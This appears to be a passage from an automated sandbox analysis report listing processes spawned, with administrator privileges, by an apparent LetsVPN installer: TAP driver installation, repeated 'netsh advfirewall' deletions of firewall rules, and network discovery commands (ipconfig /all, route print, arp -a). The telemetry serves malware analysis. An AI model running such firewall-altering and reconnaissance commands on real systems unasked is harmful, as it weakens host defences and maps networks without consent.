                                                                                                                                                                                                  MD5 hash:1E3CF83B17891AEE98C3E30012F0B034
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                  Start time:10:29:57
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                  Start time:10:29:58
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
                                                                                                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                  Start time:10:29:58
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\letsvpn\driver"
                                                                                                                                                                                                  Imagebase:0x7ff76f850000
                                                                                                                                                                                                  File size:337'920 bytes
                                                                                                                                                                                                  MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                  Start time:10:30:00
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "000000000000011C"
                                                                                                                                                                                                  Imagebase:0x7ff76f850000
                                                                                                                                                                                                  File size:337'920 bytes
                                                                                                                                                                                                  MD5 hash:294990C88B9D1FE0A54A1FA8BF4324D9
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                  Start time:10:30:00
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
                                                                                                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                  Start time:10:30:01
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
                                                                                                                                                                                                  Imagebase:0x7ff7132a0000
                                                                                                                                                                                                  File size:101'536 bytes
                                                                                                                                                                                                  MD5 hash:1E3CF83B17891AEE98C3E30012F0B034
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                  Start time:10:30:01
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                  Start time:10:30:02
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:cmd /c netsh advfirewall firewall Delete rule name=lets
                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                  Start time:10:30:02
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:40
                                                                                                                                                                                                  Start time:10:30:02
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:netsh advfirewall firewall Delete rule name=lets
                                                                                                                                                                                                  Imagebase:0x1080000
                                                                                                                                                                                                  File size:82'432 bytes
                                                                                                                                                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:41
                                                                                                                                                                                                  Start time:10:30:02
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:cmd /c netsh advfirewall firewall Delete rule name=lets.exe
                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                                  Start time:10:30:02
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:netsh advfirewall firewall Delete rule name=lets.exe
                                                                                                                                                                                                  Imagebase:0x1080000
                                                                                                                                                                                                  File size:82'432 bytes
                                                                                                                                                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:netsh advfirewall firewall Delete rule name=LetsPRO.exe
                                                                                                                                                                                                  Imagebase:0x1080000
                                                                                                                                                                                                  File size:82'432 bytes
                                                                                                                                                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:49
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:netsh advfirewall firewall Delete rule name=LetsPRO
                                                                                                                                                                                                  Imagebase:0x1080000
                                                                                                                                                                                                  File size:82'432 bytes
                                                                                                                                                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:cmd /c netsh advfirewall firewall Delete rule name=LetsVPN
                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                                  Start time:10:30:03
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:netsh advfirewall firewall Delete rule name=LetsVPN
                                                                                                                                                                                                  Imagebase:0x1080000
                                                                                                                                                                                                  File size:82'432 bytes
                                                                                                                                                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                                  Start time:10:30:04
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework
                                                                                                                                                                                                  Imagebase:0x850000
                                                                                                                                                                                                  File size:247'840 bytes
                                                                                                                                                                                                  MD5 hash:3530CB1B45FF13BA4456E4FFBCAE6379
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:54
                                                                                                                                                                                                  Start time:10:30:04
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework
                                                                                                                                                                                                  Imagebase:0x9a0000
                                                                                                                                                                                                  File size:1'588'256 bytes
                                                                                                                                                                                                  MD5 hash:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 3%, ReversingLabs
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:55
                                                                                                                                                                                                  Start time:10:30:11
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\LetsPRO.exe"
                                                                                                                                                                                                  Imagebase:0x850000
                                                                                                                                                                                                  File size:247'840 bytes
                                                                                                                                                                                                  MD5 hash:3530CB1B45FF13BA4456E4FFBCAE6379
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:56
                                                                                                                                                                                                  Start time:10:30:11
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe"
                                                                                                                                                                                                  Imagebase:0x730000
                                                                                                                                                                                                  File size:1'588'256 bytes
                                                                                                                                                                                                  MD5 hash:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:57
                                                                                                                                                                                                  Start time:10:30:18
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WmiApSrv.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                                  Imagebase:0x7ff667590000
                                                                                                                                                                                                  File size:209'920 bytes
                                                                                                                                                                                                  MD5 hash:9A48D32D7DBA794A40BF030DA500603B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:58
                                                                                                                                                                                                  Start time:10:30:18
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
                                                                                                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:59
                                                                                                                                                                                                  Start time:10:30:18
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
                                                                                                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:61
                                                                                                                                                                                                  Start time:10:30:21
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"cmd.exe" /C ipconfig /all
                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:62
                                                                                                                                                                                                  Start time:10:30:21
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:63
                                                                                                                                                                                                  Start time:10:30:21
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:ipconfig /all
                                                                                                                                                                                                  Imagebase:0xb40000
                                                                                                                                                                                                  File size:29'184 bytes
                                                                                                                                                                                                  MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:64
                                                                                                                                                                                                  Start time:10:30:26
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"cmd.exe" /C route print
                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:65
                                                                                                                                                                                                  Start time:10:30:26
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:66
                                                                                                                                                                                                  Start time:10:30:26
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\ROUTE.EXE
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:route print
                                                                                                                                                                                                  Imagebase:0xf80000
                                                                                                                                                                                                  File size:19'456 bytes
                                                                                                                                                                                                  MD5 hash:C563191ED28A926BCFDB1071374575F1
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:67
                                                                                                                                                                                                  Start time:10:30:27
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"cmd.exe" /C arp -a
                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:68
                                                                                                                                                                                                  Start time:10:30:27
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:69
                                                                                                                                                                                                  Start time:10:30:27
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\ARP.EXE
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:arp -a
                                                                                                                                                                                                  Imagebase:0x900000
                                                                                                                                                                                                  File size:22'528 bytes
                                                                                                                                                                                                  MD5 hash:4D3943EDBC9C7E18DC3469A21B30B3CE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

